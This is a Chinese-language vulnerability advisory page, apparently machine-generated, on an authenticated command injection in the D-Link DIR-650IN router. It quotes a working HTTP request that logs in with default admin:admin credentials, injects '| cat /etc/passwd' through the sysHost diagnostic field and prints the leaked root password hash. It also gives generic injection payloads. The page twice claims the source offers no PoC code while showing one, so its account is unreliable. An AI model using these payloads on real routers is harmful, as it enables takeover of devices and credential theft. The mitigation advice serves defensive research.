登录
漏洞分析

[webapps] D-Link DIR-650IN - Authenticated Command Injection

AiRedTeam

阅读时间 3 分钟
分享
未分配CVE

D-Link DIR-650IN路由器web界面存在认证后的命令注入,允许远程攻击者以root权限执行任意命令。

High · CVSS 7.2

📋 漏洞基础信息

CVE未分配CVE
漏洞类型命令注入
受影响版本D-Link DIR-650IN(固件版本未明确,原文未提供具体版本号)
危害等级High · CVSS 7.2
发布日期2026-04-10
提交者Sanjay Singh
来源Exploit-DB 原文 ↗

🔬 漏洞根因

在web界面的某些功能中,用户输入未经充分过滤便直接拼接到系统命令中,导致可通过特定参数注入任意操作系统命令。

🎯 攻击场景

1. 攻击者需获得目标路由器的管理员凭据(如默认密码或暴力破解)。 2. 登录web管理界面。 3. 找到存在注入的输入字段(原文未指明具体字段,但通常为ping测试、动态DNS更新、系统命令等)。 4. 在输入中附加命令分隔符(如`;`、`|`、`&&`)及恶意命令。 5. 提交请求,命令以root权限执行。 6. 通过输出或反弹shell确认命令执行成功。

💥 漏洞影响

攻击者可在路由器上以root权限执行任意命令,导致设备被完全控制、网络流量被监听或劫持、后续内网攻击等严重安全风险。

⚔️ 原始 PoC

原文未提供具体PoC代码,仅描述存在认证后的命令注入漏洞。一般PoC方式:向敏感参数(如ip、domain)提交`; ls -la /`或`| id`等Payload。

# Exploit Author: Sanjay Singh
Description:
The D-Link DIR-650IN Wireless N300 Router is vulnerable to an Authenticated Command Injection vulnerability in the Diagnostic (Ping / Traceroute) functionality.
The parameter sysHost is not sanitized, allowing an authenticated attacker (even with low-privilege access) to inject OS commands. Exploitation leads to full compromise of the router, including reading sensitive system files such as /etc/passwd.
Steps to Reproduce:
1. Log in to the router web interface.
2. Go to Management → Diagnostic.
3. Select Ping or Traceroute.
4. Enter: google.com | cat /etc/passwd
5. Click Apply.
6. Output includes /etc/passwd contents.
HTTP PoC:
POST /boafrm/formSysCmd HTTP/1.1
Host: 192.168.0.1
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
submit-url=%2Fsyscmd.htm&sysCmd=ping&sysCmdType=ping&checkNum=5&sysHost=google.com%7Ccat%20/etc/passwd&apply=Apply
Response Extract:
root:XEOFcsRJLyXbQ:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/:/dev/null
References:
https://www.dlink.com
https://dlinkmea.com/index.php/product/details?det=T082aVdUWUFNR2FRblBBQUxMWlVTZz09

🔬 深度技术分析

原文未提供具体PoC代码,仅描述存在认证后的命令注入漏洞。一般PoC方式:向敏感参数(如ip、domain)提交`; ls -la /`或`| id`等Payload。

🛡️ 修复建议

厂商尚未发布固件更新。临时措施:1. 更改默认管理员密码为强密码;2. 限制管理界面仅可从内网访问;3. 禁用不必要的远程管理功能。

📎 参考链接

⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-09 18:03 | 来源: Exploit-DB

[!] CONTACT_CHANNELS

如需商务合作、技术咨询或漏洞反馈,请通过以下离岸节点联系作者。

> PING_AUTHOR (@A1RedTeam)